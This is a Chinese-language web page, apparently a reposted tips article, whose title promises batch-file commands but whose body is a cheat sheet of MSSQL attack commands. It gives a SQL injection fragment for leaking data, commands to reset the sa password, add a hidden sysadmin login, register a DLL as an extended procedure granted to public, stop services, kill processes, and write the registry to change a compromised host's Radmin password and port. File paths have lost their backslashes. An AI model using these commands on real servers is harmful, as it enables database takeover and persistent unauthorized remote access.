cmd替换字符串 常用的批处理命令|Windows中的批处理的常用符号介绍(10)

REG_SZ

读注册表

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon','Userinit'

读取目录内容

exec master..xp_dirtree 'c:winntsystem32',1,1

备份

backup database pubs to disk = 'c:123.bak'

//爆出长度

And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

更改sa口令方法：用sql综合利用工具连接后，执行命令：

exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：

exec master.dbo.sp_addlogin test,ptlove

exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:

exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程

EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:winntsystem32sqllog.dll'

GRANT exec On xp_proxiedadata TO public

停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'

exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。

xp_getfiledetails 'C:InetpubwwwrootSQLInjectlogin.asp'

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。

所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab

'c:test.cab','mszip',1,

'C:InetpubwwwrootSQLInjectlogin.asp',

'C:InetpubwwwrootSQLInjectsecurelogin.asp'

xp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。

利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解开压缩档。

xp_unpackcab 'c:test.cab','c:temp',1

某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEMRAdminv2.0ServerParameters','port','REG_BINARY',0xd20400 则端口值改为1234

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-79894-10.html